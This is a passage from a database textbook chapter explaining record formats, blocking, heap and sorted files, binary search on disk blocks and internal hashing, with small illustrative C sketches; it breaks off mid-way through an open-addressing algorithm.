value is formed of one or more bytes and corresponds to a particular field of the record. Records usually describe entities and their attributes. 
For example, an EMPLOYEE record represents an employee entity, and each field value in the record specifies some attribute of that employee, such as Name, Birth_date, Salary, or Supervisor. A collection of field names and their corre- 599 Disk Storage, Basic File Structures, and Hashing sponding data types constitutes a record type or record format definition. A data type, associated with each field, specifies the types of values a field can take. The data type of a field is usually one of the standard data types used in program- ming. These include numeric (integer, long integer, or floating point), string of characters (fixed-length or varying), Boolean (having 0 and 1 or TRUE and FALSE values only), and sometimes specially coded date and time data types. The number of bytes required for each data type is fixed for a given computer system. An integer may require 4 bytes, a long integer 8 bytes, a real number 4 bytes, a Boolean 1 byte, a date 10 bytes (assuming a format of YYYY-MM-DD), and a fixed-length string of k characters k bytes. Variable-length strings may require as many bytes as there are characters in each field value. For example, an EMPLOYEE record type may be defined—using the C programming language notation—as the following structure: struct employee{ char name[30]; char ssn[9]; int salary; int job_code; char department[20]; } ; In some database applications, the need may arise for storing data items that consist of large unstructured objects, which represent images, digitized video or audio streams, or free text. These are referred to as BLOBs (binary large objects). A BLOB data item is typically stored separately from its record in a pool of disk blocks, and a pointer to the BLOB is included in the record. 4.2 Files, Fixed-Length Records, and Variable-Length Records A file is a sequence of records. In many cases, all records in a file are of the same record type. If every record in the file has exactly the same size (in bytes), the file is said to be made up of fixed-length records. If different records in the file have dif- ferent sizes, the file is said to be made up of variable-length records. A file may have variable-length records for several reasons: ■ The file records are of the same record type, but one or more of the fields are of varying size (variable-length fields). For example, the Name field of EMPLOYEE can be a variable-length field. ■ The file records are of the same record type, but one or more of the fields may have multiple values for individual records; such a field is called a repeating field and a group of values for the field is often called a repeating group. ■ The file records are of the same record type, but one or more of the fields are optional; that is, they may have values for some but not all of the file records (optional fields). 600 Name = Smith, John Ssn = 123456789 DEPARTMENT = Computer Smith, John Name 1 (a) (b) (c) 1 12 21 25 29 Name Ssn Salary Job_code Department Hire_date 31 40 44 48 68 Ssn Salary Job_code Department Separator Characters123456789 XXXX XXXX Computer Separator Characters Separates field name from field value Separates fields Terminates record = Disk Storage, Basic File Structures, and Hashing Figure 5 Three record storage formats. (a) A fixed-length record with six fields and size of 71 bytes. (b) A record with two variable-length fields and three fixed-length fields. (c) A variable-field record with three types of separator characters. 
■ The file contains records of different record types and hence of varying size (mixed file). This would occur if related records of different types were clustered (placed together) on disk blocks; for example, the GRADE_REPORT records of a particular student may be placed following that STUDENT’s record. The fixed-length EMPLOYEE records in Figure 5(a) have a record size of 71 bytes. Every record has the same fields, and field lengths are fixed, so the system can iden- tify the starting byte position of each field relative to the starting position of the record. This facilitates locating field values by programs that access such files. Notice that it is possible to represent a file that logically should have variable-length records as a fixed-length records file. For example, in the case of optional fields, we could have every field included in every file record but store a special NULL value if no value exists for that field. For a repeating field, we could allocate as many spaces in each record as the maximum possible number of occurrences of the field. In either case, space is wasted when certain records do not have values for all the physical spaces provided in each record. Now we consider other options for formatting records of a file of variable-length records. 601 Disk Storage, Basic File Structures, and Hashing For variable-length fields, each record has a value for each field, but we do not know the exact length of some field values. To determine the bytes within a particular record that represent each field, we can use special separator characters (such as ? or % or $)—which do not appear in any field value—to terminate variable-length fields, as shown in Figure 5(b), or we can store the length in bytes of the field in the record, preceding the field value. A file of records with optional fields can be formatted in different ways. If the total number of fields for the record type is large, but the number of fields that actually appear in a typical record is small, we can include in each record a sequence of pairs rather than just the field values. Three types of sep-
arator characters are used in Figure 5(c), although we could use the same separator
character for the first two purposes—separating the field name from the field value
and separating one field from the next field. A more practical option is to assign a
short field type code—say, an integer number—to each field and include in each
record a sequence of <field-type, field-value> pairs rather than <field-name, field-value> pairs.

A repeating field needs one separator character to separate the repeating values of
the field and another separator character to indicate termination of the field.
Finally, for a file that includes records of different types, each record is preceded by a
record type indicator. Understandably, programs that process files of variable-
length records—which are usually part of the file system and hence hidden from the
typical programmers—need to be more complex than those for fixed-length
records, where the starting position and size of each field are known and fixed.5
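
To make the preceding formatting options more concrete, the following C sketch (an illustration only; the field-type codes, the one-byte length prefix, and the example field values are assumptions, not a format prescribed by the text) builds a variable-length record as a sequence of <field-type, field-value> pairs, storing the length of each value instead of using a separator character.

#include <stdio.h>
#include <string.h>

enum field_type { F_NAME = 1, F_SSN = 2, F_SALARY = 3 };   /* short field type codes */

/* Append one <field-type, field-value> pair to the record buffer. The
   value is stored as a one-byte length followed by the value bytes.
   Returns the new offset within the record. */
static size_t put_field(unsigned char *rec, size_t off,
                        unsigned char type, const void *val, unsigned char len)
{
    rec[off++] = type;              /* field type code               */
    rec[off++] = len;               /* length of the value in bytes  */
    memcpy(rec + off, val, len);    /* the field value itself        */
    return off + len;
}

int main(void)
{
    unsigned char rec[256];
    size_t off = 0;
    int salary = 55000;

    /* Only the fields actually present need to be stored. */
    off = put_field(rec, off, F_NAME,   "Smith, John", 11);
    off = put_field(rec, off, F_SSN,    "123456789",   9);
    off = put_field(rec, off, F_SALARY, &salary,       sizeof salary);

    printf("variable-length record occupies %zu bytes\n", off);
    return 0;
}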

4.3 Record Blocking and Spanned versus Unspanned Records

The records of a file must be allocated to disk blocks because a block is the unit of
data transfer between disk and memory. When the block size is larger than the
record size, each block will contain numerous records, although some files may have
unusually large records that cannot fit in one block. Suppose that the block size is B
bytes. For a file of fixed-length records of size R bytes, with B ≥ R, we can fit bfr =
⎣B/R⎦ records per block, where the ⎣(x)⎦ (floor function) rounds down the number x
to an integer. The value bfr is called the blocking factor for the file. In general, R
may not divide B exactly, so we have some unused space in each block equal to

B − (bfr * R) bytes
To utilize this unused space, we can store part of a record on one block and the rest
on another. A pointer at the end of the first block points to the block containing the
remainder of the record in case it is not the next consecutive block on disk. This
organization is called spanned because records can span more than one block.
Whenever a record is larger than a block, we must use a spanned organization. If
records are not allowed to cross block boundaries, the organization is called
unspanned. This is used with fixed-length records having B > R because it makes
each record start at a known location in the block, simplifying record processing. For
variable-length records, either a spanned or an unspanned organization can be used.
If the average record is large, it is advantageous to use spanning to reduce the lost
space in each block. Figure 6 illustrates spanned versus unspanned organization.

Figure 6 Types of record organization. (a) Unspanned. (b) Spanned.

5Other schemes are also possible for representing variable-length records.

For variable-length records using spanned organization, each block may store a dif-
ferent number of records. In this case, the blocking factor bfr represents the average
number of records per block for the file. We can use bfr to calculate the number of
blocks b needed for a file of r records:

b = ⎡(r/bfr)⎤ blocks
where the ⎡(x)⎤ (ceiling function) rounds the value x up to the next integer.
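
The arithmetic above is easy to check with a short C program; the block size, record size, and record count below are made-up example values, and integer division stands in for the floor and ceiling functions.

#include <stdio.h>

int main(void)
{
    unsigned B = 512;   /* block size in bytes (example value)        */
    unsigned R = 71;    /* fixed record size in bytes (example value) */
    unsigned r = 30000; /* number of records in the file              */

    unsigned bfr    = B / R;                 /* bfr = floor(B/R) records per block */
    unsigned unused = B - (bfr * R);         /* wasted bytes per block (unspanned) */
    unsigned b      = (r + bfr - 1) / bfr;   /* b = ceiling(r/bfr) blocks needed   */

    printf("bfr = %u records/block, %u unused bytes/block, %u blocks\n",
           bfr, unused, b);
    return 0;
}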

4.4 Allocating File Blocks on Disk
There are several standard techniques for allocating the blocks of a file on disk. In
contiguous allocation, the file blocks are allocated to consecutive disk blocks. This
makes reading the whole file very fast using double buffering, but it makes expand-
ing the file difficult. In linked allocation, each file block contains a pointer to the
next file block. This makes it easy to expand the file but makes it slow to read the
whole file. A combination of the two allocates clusters of consecutive disk blocks,
and the clusters are linked. Clusters are sometimes called file segments or extents.
Another possibility is to use indexed allocation, where one or more index blocks
contain pointers to the actual file blocks. It is also common to use combinations of
these techniques.
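
The following declarations sketch, under an assumed block size and pointer width, what the on-disk bookkeeping for two of these schemes might look like; they are illustrative only and not taken from any particular file system.

#include <stdint.h>
#include <stdio.h>

#define BLOCK_SIZE 512u   /* assumed block size */

/* Linked allocation: each data block reserves its last few bytes for a
   pointer (a logical block address) to the next block of the file; a
   value of 0 can mark the end of the chain. */
struct linked_block {
    uint8_t  data[BLOCK_SIZE - sizeof(uint32_t)];
    uint32_t next_block;
};

/* Indexed allocation: an index block holds nothing but pointers to the
   actual file blocks. */
struct index_block {
    uint32_t block_ptr[BLOCK_SIZE / sizeof(uint32_t)];
};

int main(void)
{
    printf("data bytes per linked block: %u\n",
           (unsigned)(BLOCK_SIZE - sizeof(uint32_t)));
    printf("block pointers per index block: %u\n",
           (unsigned)(BLOCK_SIZE / sizeof(uint32_t)));
    return 0;
}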

4.5 File Headers
A file header or file descriptor contains information about a file that is needed by
the system programs that access the file records. The header includes information to
determine the disk addresses of the file blocks as well as the record format descrip-
tions, which may include field lengths and the order of fields within a record for
fixed-length unspanned records and field type codes, separator characters, and
record type codes for variable-length records.

To search for a record on disk, one or more blocks are copied into main memory
buffers. Programs then search for the desired record or records within the buffers,
using the information in the file header. If the address of the block that contains the
desired record is not known, the search programs must do a linear search through
the file blocks. Each file block is copied into a buffer and searched until the record is
located or all the file blocks have been searched unsuccessfully. This can be very
time-consuming for a large file. The goal of a good file organization is to locate the
block that contains a desired record with a minimal number of block transfers.

5 Operations on Files
Operations on files are usually grouped into retrieval operations and update oper-
ations. The former do not change any data in the file, but only locate certain records
so that their field values can be examined and processed. The latter change the file
by insertion or deletion of records or by modification of field values. In either case,
we may have to select one or more records for retrieval, deletion, or modification
based on a selection condition (or filtering condition), which specifies criteria that
the desired record or records must satisfy.

Consider an EMPLOYEE file with fields Name, Ssn, Salary, Job_code, and Department.
A simple selection condition may involve an equality comparison on some field
value—for example, (Ssn = ‘123456789’) or (Department = ‘Research’). More com-
plex conditions can involve other types of comparison operators, such as > or ≥; an
example is (Salary ≥ 30000). The general case is to have an arbitrary Boolean expres-
sion on the fields of the file as the selection condition.

Search operations on files are generally based on simple selection conditions. A
complex condition must be decomposed by the DBMS (or the programmer) to
extract a simple condition that can be used to locate the records on disk. Each
located record is then checked to determine whether it satisfies the full selection
condition. For example, we may extract the simple condition (Department =
‘Research’) from the complex condition ((Salary ≥ 30000) AND (Department =
‘Research’)); each record satisfying (Department = ‘Research’) is located and then
tested to see if it also satisfies (Salary ≥ 30000).
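
A small C sketch of this decomposition is shown below; the struct is a trimmed-down EMPLOYEE record and the function names are illustrative. Records are assumed to have already been located using the simple condition (Department = ‘Research’), and each one is then tested against the full condition.

#include <stdbool.h>
#include <string.h>

/* Trimmed-down EMPLOYEE record with only the fields used here. */
struct employee {
    int  salary;
    char department[20];
};

/* The full (complex) selection condition:
   (Salary >= 30000) AND (Department = 'Research'). */
static bool satisfies_full_condition(const struct employee *e)
{
    return e->salary >= 30000 && strcmp(e->department, "Research") == 0;
}

/* 'located' holds records already found via the simple condition
   (Department = 'Research'); each is re-checked against the full condition. */
static int filter_located(const struct employee *located, int n,
                          const struct employee **out)
{
    int kept = 0;
    for (int i = 0; i < n; i++)
        if (satisfies_full_condition(&located[i]))
            out[kept++] = &located[i];
    return kept;
}

int main(void)
{
    const struct employee located[] = {   /* both matched Department = 'Research' */
        { 42000, "Research" }, { 25000, "Research" }
    };
    const struct employee *result[2];
    int kept = filter_located(located, 2, result);
    return kept == 1 ? 0 : 1;   /* only the first record passes the salary test */
}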

When several file records satisfy a search condition, the first record—with respect to
the physical sequence of file records—is initially located and designated the current
record. Subsequent search operations commence from this record and locate the
next record in the file that satisfies the condition.

Actual operations for locating and accessing file records vary from system to system.
Below, we present a set of representative operations. Typically, high-level programs,
such as DBMS software programs, access records by using these commands, so we
sometimes refer to program variables in the following descriptions:

■ Open. Prepares the file for reading or writing. Allocates appropriate buffers
(typically at least two) to hold file blocks from disk, and retrieves the file
header. Sets the file pointer to the beginning of the file.

■ Reset. Sets the file pointer of an open file to the beginning of the file.
■ Find (or Locate). Searches for the first record that satisfies a search condi-
tion. Transfers the block containing that record into a main memory buffer
(if it is not already there). The file pointer points to the record in the buffer
and it becomes the current record. Sometimes, different verbs are used to
indicate whether the located record is to be retrieved or updated.

■ Read (or Get). Copies the current record from the buffer to a program vari-
able in the user program. This command may also advance the current
record pointer to the next record in the file, which may necessitate reading
the next file block from disk.

■ FindNext. Searches for the next record in the file that satisfies the search
condition. Transfers the block containing that record into a main memory
buffer (if it is not already there). The record is located in the buffer and
becomes the current record. Various forms of FindNext (for example, Find
Next record within a current parent record, Find Next record of a given type,
or Find Next record where a complex condition is met) are available in
legacy DBMSs based on the hierarchical and network models.

■ Delete. Deletes the current record and (eventually) updates the file on disk
to reflect the deletion.

■ Modify. Modifies some field values for the current record and (eventually)
updates the file on disk to reflect the modification.

■ Insert. Inserts a new record in the file by locating the block where the record
is to be inserted, transferring that block into a main memory buffer (if it is
not already there), writing the record into the buffer, and (eventually) writ-
ing the buffer to disk to reflect the insertion.

■ Close. Completes the file access by releasing the buffers and performing any
other needed cleanup operations.

The preceding (except for Open and Close) are called record-at-a-time operations
because each operation applies to a single record. It is possible to streamline the
operations Find, FindNext, and Read into a single operation, Scan, whose descrip-
tion is as follows:

■ Scan. If the file has just been opened or reset, Scan returns the first record;
otherwise it returns the next record. If a condition is specified with the oper-
ation, the returned record is the first or next record satisfying the condition.
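
The following C sketch shows how a program might drive such a record-at-a-time interface. The Open/Scan functions below are toy stand-ins that walk an in-memory array rather than buffered disk blocks, and their names and signatures are assumptions made for the illustration, not an API defined by the text.

#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* One EMPLOYEE record, trimmed to two fields for the example. */
struct record { char department[20]; int salary; };

/* Per-file state maintained by Open/Scan/Close. Here the "file" is an
   in-memory array standing in for buffered disk blocks. */
struct file_handle {
    const struct record *recs;   /* the records of the file  */
    int n;                       /* number of records        */
    int pos;                     /* current record position  */
};

/* Open (and Reset): remember the records and start at the beginning. */
static void open_file(struct file_handle *f, const struct record *recs, int n)
{
    f->recs = recs;
    f->n = n;
    f->pos = 0;
}

/* Scan: return the first/next record satisfying cond, or NULL when the
   file is exhausted. Passing a NULL condition returns every record. */
static const struct record *scan(struct file_handle *f,
                                 bool (*cond)(const struct record *))
{
    while (f->pos < f->n) {
        const struct record *r = &f->recs[f->pos++];
        if (cond == NULL || cond(r))
            return r;
    }
    return NULL;
}

static bool is_research(const struct record *r)
{
    return strcmp(r->department, "Research") == 0;
}

int main(void)
{
    const struct record file[] = {
        { "Research", 42000 }, { "Admin", 35000 }, { "Research", 28000 }
    };
    struct file_handle f;
    const struct record *r;

    open_file(&f, file, 3);
    while ((r = scan(&f, is_research)) != NULL)   /* record-at-a-time loop */
        printf("%s %d\n", r->department, r->salary);
    return 0;                                     /* a real Close would release buffers */
}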

In database systems, additional set-at-a-time higher-level operations may be
applied to a file. Examples of these are as follows:

■ FindAll. Locates all the records in the file that satisfy a search condition.
■ Find (or Locate) n. Searches for the first record that satisfies a search condi-
tion and then continues to locate the next n – 1 records satisfying the same
condition. Transfers the blocks containing the n records to the main memory
buffer (if not already there).

■ FindOrdered. Retrieves all the records in the file in some specified order.
■ Reorganize. Starts the reorganization process. As we shall see, some file
organizations require periodic reorganization. An example is to reorder the
file records by sorting them on a specified field.

At this point, it is worthwhile to note the difference between the terms file organiza-
tion and access method. A file organization refers to the organization of the data of
a file into records, blocks, and access structures; this includes the way records and
blocks are placed on the storage medium and interlinked. An access method, on the
other hand, provides a group of operations—such as those listed earlier—that can
be applied to a file. In general, it is possible to apply several access methods to a file
organization. Some access methods, though, can be applied only to files organized
in certain ways. For example, we cannot apply an indexed access method to a file
without an index.

Usually, we expect to use some search conditions more than others. Some files may
be static, meaning that update operations are rarely performed; other, more
dynamic files may change frequently, so update operations are constantly applied to
them. A successful file organization should perform as efficiently as possible the
operations we expect to apply frequently to the file. For example, consider the
EMPLOYEE file, as shown in Figure 5(a), which stores the records for current
employees in a company. We expect to insert records (when employees are hired),
delete records (when employees leave the company), and modify records (for exam-
ple, when an employee’s salary or job is changed). Deleting or modifying a record
requires a selection condition to identify a particular record or set of records.
Retrieving one or more records also requires a selection condition.

If users expect mainly to apply a search condition based on Ssn, the designer must
choose a file organization that facilitates locating a record given its Ssn value. This
may involve physically ordering the records by Ssn value or defining an index on
Ssn. Suppose that a second application uses the file to generate employees’ pay-
checks and requires that paychecks are grouped by department. For this application,
it is best to order employee records by department and then by name within each
department. The clustering of records into blocks and the organization of blocks on
cylinders would now be different than before. However, this arrangement conflicts
with ordering the records by Ssn values. If both applications are important, the
designer should choose an organization that allows both operations to be done effi-
ciently. Unfortunately, in many cases a single organization does not allow all needed
operations on a file to be implemented efficiently. In such cases, a compromise must be
chosen that takes into account the expected importance and mix of retrieval and
update operations.

In the following sections, we discuss methods for organizing records of a file on
disk. Several general techniques, such as ordering, hashing, and indexing, are used
to create access methods. Additionally, various general techniques for handling
insertions and deletions work with many file organizations.

6 Files of Unordered Records (Heap Files)
In this simplest and most basic type of organization, records are placed in the file in
the order in which they are inserted, so new records are inserted at the end of the
file. Such an organization is called a heap or pile file.6 This organization is often
used with additional access paths, such as secondary indexes. It is also used to collect
and store data records for future use.

Inserting a new record is very efficient. The last disk block of the file is copied into a
buffer, the new record is added, and the block is then rewritten back to disk. The
address of the last file block is kept in the file header. However, searching for a
record using any search condition involves a linear search through the file block by
block—an expensive procedure. If only one record satisfies the search condition,
then, on the average, a program will read into memory and search half the file
blocks before it finds the record. For a file of b blocks, this requires searching (b/2)
blocks, on average. If no records or several records satisfy the search condition, the
program must read and search all b blocks in the file.
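
A toy C model of a heap file makes both costs visible. The "disk" below is just an array of blocks, the blocking factor is an arbitrary example value, and real block I/O through main memory buffers is deliberately left out; the counter only records how many blocks a linear search touches.

#include <stdio.h>
#include <string.h>

#define BFR        4          /* blocking factor (example value)      */
#define MAX_BLOCKS 100        /* capacity of the toy "disk"           */

struct record { char ssn[10]; int salary; };
struct block  { struct record recs[BFR]; int nrecs; };

static struct block disk[MAX_BLOCKS];
static int nblocks = 1;       /* the file starts with one empty block */

/* Insert: append the record to the last block of the file, extending the
   file with a new block when the last one is full. This is what makes
   heap-file insertion cheap. */
static void heap_insert(const struct record *r)
{
    struct block *last = &disk[nblocks - 1];
    if (last->nrecs == BFR)                  /* last block full */
        last = &disk[nblocks++];             /* (no overflow check in this toy) */
    last->recs[last->nrecs++] = *r;
}

/* Linear search: examine the blocks one by one. On average about half of
   the b blocks are read when exactly one record matches; all b are read
   when there is no match. */
static const struct record *heap_find(const char *ssn, int *blocks_read)
{
    *blocks_read = 0;
    for (int b = 0; b < nblocks; b++) {
        (*blocks_read)++;
        for (int i = 0; i < disk[b].nrecs; i++)
            if (strcmp(disk[b].recs[i].ssn, ssn) == 0)
                return &disk[b].recs[i];
    }
    return NULL;
}

int main(void)
{
    for (int i = 0; i < 10; i++) {
        struct record r;
        sprintf(r.ssn, "%09d", i);
        r.salary = 30000 + i;
        heap_insert(&r);
    }
    int cost;
    const struct record *r = heap_find("000000007", &cost);
    printf("found=%d after reading %d block(s) of %d\n", r != NULL, cost, nblocks);
    return 0;
}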

To delete a record, a program must first find its block, copy the block into a buffer,
delete the record from the buffer, and finally rewrite the block back to the disk. This
leaves unused space in the disk block. Deleting a large number of records in this way
results in wasted storage space. Another technique used for record deletion is to
have an extra byte or bit, called a deletion marker, stored with each record. A record
is deleted by setting the deletion marker to a certain value. A different value for the
marker indicates a valid (not deleted) record. Search programs consider only valid
records in a block when conducting their search. Both of these deletion techniques
require periodic reorganization of the file to reclaim the unused space of deleted
records. During reorganization, the file blocks are accessed consecutively, and
records are packed by removing deleted records. After such a reorganization, the
blocks are filled to capacity once more. Another possibility is to use the space of
deleted records when inserting new records, although this requires extra bookkeep-
ing to keep track of empty locations.

We can use either spanned or unspanned organization for an unordered file, and it
may be used with either fixed-length or variable-length records. Modifying a vari-
able-length record may require deleting the old record and inserting a modified
record because the modified record may not fit in its old space on disk.

To read all records in order of the values of some field, we create a sorted copy of the
file. Sorting is an expensive operation for a large disk file, and special techniques for
external sorting are used.

For a file of unordered fixed-length records using unspanned blocks and contiguous
allocation, it is straightforward to access any record by its position in the file. If the
file records are numbered 0, 1, 2, …, r − 1 and the records in each block are num-
bered 0, 1, …, bfr − 1, where bfr is the blocking factor, then the ith record of the file
is located in block ⎣(i/bfr)⎦ and is the (i mod bfr)th record in that block. Such a file
is often called a relative or direct file because records can easily be accessed directly
by their relative positions. Accessing a record by its position does not help locate a
record based on a search condition; however, it facilitates the construction of access
paths on the file, such as indexes.
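
A small C sketch of this address arithmetic (the blocking factor and record number are illustrative):

    #include <stdio.h>

    /* For an unordered file of fixed-length records with unspanned blocks and
     * contiguous allocation, record i lives in block floor(i / bfr) and is the
     * (i mod bfr)th record within that block.                                  */
    void locate_record(long i, long bfr, long *block_no, long *pos_in_block)
    {
        *block_no     = i / bfr;    /* integer division gives the floor */
        *pos_in_block = i % bfr;
    }

    int main(void)
    {
        long block_no, pos;
        locate_record(125, 6, &block_no, &pos);   /* e.g., bfr = 6 records per block */
        printf("record 125 -> block %ld, position %ld\n", block_no, pos);
        /* prints: record 125 -> block 20, position 5 */
        return 0;
    }
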

6Sometimes this organization is called a sequential file.

7 Files of Ordered Records (Sorted Files)
We can physically order the records of a file on disk based on the values of one of
their fields—called the ordering field. This leads to an ordered or sequential file.7

If the ordering field is also a key field of the file—a field guaranteed to have a
unique value in each record—then the field is called the ordering key for the file.
Figure 7 shows an ordered file with Name as the ordering key field (assuming that
employees have distinct names).

Ordered files have some advantages over unordered files. First, reading the records
in order of the ordering key values becomes extremely efficient because no sorting is
required. Second, finding the next record from the current one in order of the order-
ing key usually requires no additional block accesses because the next record is in the
same block as the current one (unless the current record is the last one in the block).
Third, using a search condition based on the value of an ordering key field results in
faster access when the binary search technique is used, which constitutes an improvement
over linear searches, although binary search is not often used for disk files. Ordered files are
blocked and stored on contiguous cylinders to minimize the seek time.

A binary search for disk files can be done on the blocks rather than on the records.
Suppose that the file has b blocks numbered 1, 2, …, b; the records are ordered by
ascending value of their ordering key field; and we are searching for a record whose
ordering key field value is K. Assuming that disk addresses of the file blocks are avail-
able in the file header, the binary search can be described by Algorithm 1. A binary
search usually accesses log_2(b) blocks, whether the record is found or not—an
improvement over linear searches, where, on the average, (b/2) blocks are accessed
when the record is found and b blocks are accessed when the record is not found.

Algorithm 1. Binary Search on an Ordering Key of a Disk File
l ← 1; u ← b; (* b is the number of file blocks *)
while (u ≥ l) do
    begin
        i ← (l + u) div 2;
        read block i of the file into the buffer;
        if K < (ordering key field value of the first record in block i)
            then u ← i − 1
        else if K > (ordering key field value of the last record in block i)
            then l ← i + 1
        else if the record with ordering key field value = K is in the buffer
            then goto found
        else goto notfound;
    end;
goto notfound;
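
The pseudocode above can be rendered directly in C; the sketch below simulates the ordered file as an in-memory array of integer ordering-key values, so reading a block reduces to indexing the array. The block count, blocking factor, and key values are illustrative assumptions.

    #include <stdio.h>

    #define B    8          /* number of file blocks (hypothetical)          */
    #define BFR  4          /* records per block (hypothetical)              */

    /* A simulated ordered file: blocks 1..B of integer ordering-key values,
     * ascending within and across blocks (row 0 is unused so that numbering
     * matches the 1..b convention of Algorithm 1).                           */
    static long file[B + 1][BFR] = {
        {0}, {2, 5, 7, 9}, {12, 15, 18, 20}, {23, 26, 29, 31}, {34, 38, 40, 44},
        {47, 50, 53, 55}, {58, 61, 64, 67}, {70, 73, 77, 80}, {83, 86, 90, 95}
    };

    /* C rendering of Algorithm 1: binary search on the blocks of an ordered file.
     * Returns the block number containing ordering key K, or -1 if absent.
     * About log_2(B) blocks are "read" whether or not the record is found.      */
    int binary_search_blocks(long K)
    {
        int l = 1, u = B;
        while (u >= l) {
            int i = (l + u) / 2;
            const long *blk = file[i];          /* stands in for reading block i */
            if (K < blk[0])
                u = i - 1;
            else if (K > blk[BFR - 1])
                l = i + 1;
            else {
                for (int r = 0; r < BFR; r++)   /* search the buffered block */
                    if (blk[r] == K)
                        return i;
                return -1;                      /* K lies in this block's range,
                                                   but no record carries it    */
            }
        }
        return -1;
    }

    int main(void)
    {
        printf("key 53 -> block %d\n", binary_search_blocks(53));  /* block 5 */
        printf("key 54 -> block %d\n", binary_search_blocks(54));  /* -1      */
        return 0;
    }
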

A search criterion involving the conditions >, <, ≥, and ≤ on the ordering field is quite efficient, since the physical ordering of records means that all records satisfying the condition are contiguous in the file. For example, referring to Figure 7, if the search criterion is (Name < ‘G’)—where < means alphabetically before—the records satisfying the search criterion are those from the beginning of the file up to the first record that has a Name value starting with the letter ‘G’.

7The term sequential file has also been used to refer to unordered files, although it is more appropriate for ordered files.

[Figure 7: Some blocks of an ordered (sequential) file of EMPLOYEE records with Name as the ordering key field. Blocks 1 through n hold records ordered alphabetically by Name, from Aaron, Ed through Zimmer, Byron; each record also carries the fields Ssn, Birth_date, Job, Salary, and Sex.]

Ordering does not provide any advantages for random or ordered access of the records based on values of the other nonordering fields of the file. In these cases, we do a linear search for random access. To access the records in order based on a nonordering field, it is necessary to create another sorted copy—in a different order—of the file.

Inserting and deleting records are expensive operations for an ordered file because the records must remain physically ordered. To insert a record, we must find its correct position in the file, based on its ordering field value, and then make space in the file to insert the record in that position. For a large file this can be very time-consuming because, on the average, half the records of the file must be moved to make space for the new record. This means that half the file blocks must be read and rewritten after records are moved among them. For record deletion, the problem is less severe if deletion markers and periodic reorganization are used.

One option for making insertion more efficient is to keep some unused space in each block for new records. However, once this space is used up, the original problem resurfaces. Another frequently used method is to create a temporary unordered file called an overflow or transaction file. With this technique, the actual ordered file is called the main or master file. New records are inserted at the end of the overflow file rather than in their correct position in the main file. Periodically, the overflow file is sorted and merged with the master file during file reorganization. Insertion becomes very efficient, but at the cost of increased complexity in the search algorithm. The overflow file must be searched using a linear search if, after the binary search, the record is not found in the main file. For applications that do not require the most up-to-date information, overflow records can be ignored during a search.
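
A minimal sketch of the combined lookup just described, with a binary search over the sorted master file followed, on a miss, by a linear scan of the unordered overflow file; the two in-memory arrays stand in for the two disk files:

    #include <stdio.h>
    #include <stdlib.h>

    /* Sorted master (main) file of ordering-key values, plus an unordered
     * overflow (transaction) file of recently inserted keys. Both arrays are
     * illustrative in-memory stand-ins for the two disk files.               */
    static long master[]   = {10, 20, 30, 40, 50, 60, 70, 80};
    static long overflow[] = {45, 12, 73};

    static int cmp_long(const void *a, const void *b)
    {
        long x = *(const long *)a, y = *(const long *)b;
        return (x > y) - (x < y);
    }

    /* Binary-search the master file; if the key is absent, fall back to a
     * linear search of the overflow file, as described in the text.          */
    int lookup(long key)
    {
        size_t n_master = sizeof master / sizeof master[0];
        size_t n_over   = sizeof overflow / sizeof overflow[0];

        if (bsearch(&key, master, n_master, sizeof master[0], cmp_long) != NULL)
            return 1;                        /* found in the main file        */

        for (size_t i = 0; i < n_over; i++)  /* linear scan of overflow       */
            if (overflow[i] == key)
                return 1;
        return 0;
    }

    int main(void)
    {
        printf("45 -> %s\n", lookup(45) ? "found (overflow)" : "absent");
        printf("55 -> %s\n", lookup(55) ? "found" : "absent");
        return 0;
    }
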
Modifying a field value of a record depends on two factors: the search condition to locate the record and the field to be modified. If the search condition involves the ordering key field, we can locate the record using a binary search; otherwise we must do a linear search. A nonordering field can be modified by changing the record and rewriting it in the same physical location on disk—assuming fixed-length records. Modifying the ordering field means that the record can change its position in the file. This requires deletion of the old record followed by insertion of the modified record.

Reading the file records in order of the ordering field is quite efficient if we ignore the records in overflow, since the blocks can be read consecutively using double buffering. To include the records in overflow, we must merge them in their correct positions; in this case, first we can reorganize the file, and then read its blocks sequentially. To reorganize the file, first we sort the records in the overflow file, and then merge them with the master file. The records marked for deletion are removed during the reorganization.

Table 2 summarizes the average access time in block accesses to find a specific record in a file with b blocks.

Table 2   Average Access Times for a File of b Blocks under Basic File Organizations

Type of Organization    Access/Search Method               Average Blocks to Access a Specific Record
Heap (unordered)        Sequential scan (linear search)    b/2
Ordered                 Sequential scan                    b/2
Ordered                 Binary search                      log_2 b

Ordered files are rarely used in database applications unless an additional access path, called a primary index, is used; this results in an indexed-sequential file. This further improves the random access time on the ordering key field. If the ordering attribute is not a key, the file is called a clustered file.

8 Hashing Techniques

Another type of primary file organization is based on hashing, which provides very fast access to records under certain search conditions. This organization is usually called a hash file.8 The search condition must be an equality condition on a single field, called the hash field. In most cases, the hash field is also a key field of the file, in which case it is called the hash key. The idea behind hashing is to provide a function h, called a hash function or randomizing function, which is applied to the hash field value of a record and yields the address of the disk block in which the record is stored. A search for the record within the block can be carried out in a main memory buffer. For most records, we need only a single-block access to retrieve that record.

Hashing is also used as an internal search structure within a program whenever a group of records is accessed exclusively by using the value of one field. We describe the use of hashing for internal files in Section 8.1; then we show how it is modified to store external files on disk in Section 8.2. In Section 8.3 we discuss techniques for extending hashing to dynamically growing files.

8.1 Internal Hashing

For internal files, hashing is typically implemented as a hash table through the use of an array of records. Suppose that the array index range is from 0 to M − 1, as shown in Figure 8(a); then we have M slots whose addresses correspond to the array indexes. We choose a hash function that transforms the hash field value into an integer between 0 and M − 1. One common hash function is the h(K) = K mod M function, which returns the remainder of an integer hash field value K after division by M; this value is then used for the record address.

8A hash file has also been called a direct file.
Noninteger hash field values can be transformed into integers before the mod function is applied. For character strings, the numeric (ASCII) codes associated with characters can be used in the transformation—for example, by multiplying those code values. For a hash field whose data type is a string of 20 characters, Algorithm 2(a) can be used to calculate the hash address. We assume that the code function returns the numeric code of a character and that we are given a hash field value K of type K: array [1..20] of char (in Pascal) or char K[20] (in C).

[Figure 8: Internal hashing data structures. (a) Array of M positions (addresses 0 to M − 1) for use in internal hashing, each position holding the record data fields (Name, Ssn, Job, Salary). (b) Collision resolution by chaining records: an overflow space follows the M main positions, and an overflow pointer in each location links colliding records into a list; a null pointer is represented by −1.]

Algorithm 2. Two simple hashing algorithms: (a) Applying the mod hash function to a character string K. (b) Collision resolution by open addressing.

(a) temp ← 1;
    for i ← 1 to 20 do temp ← temp * code(K[i]) mod M;
    hash_address ← temp mod M;

(b) i ← hash_address(K); a ← i;
    if location i is occupied
        then begin i ← (i + 1) mod M;
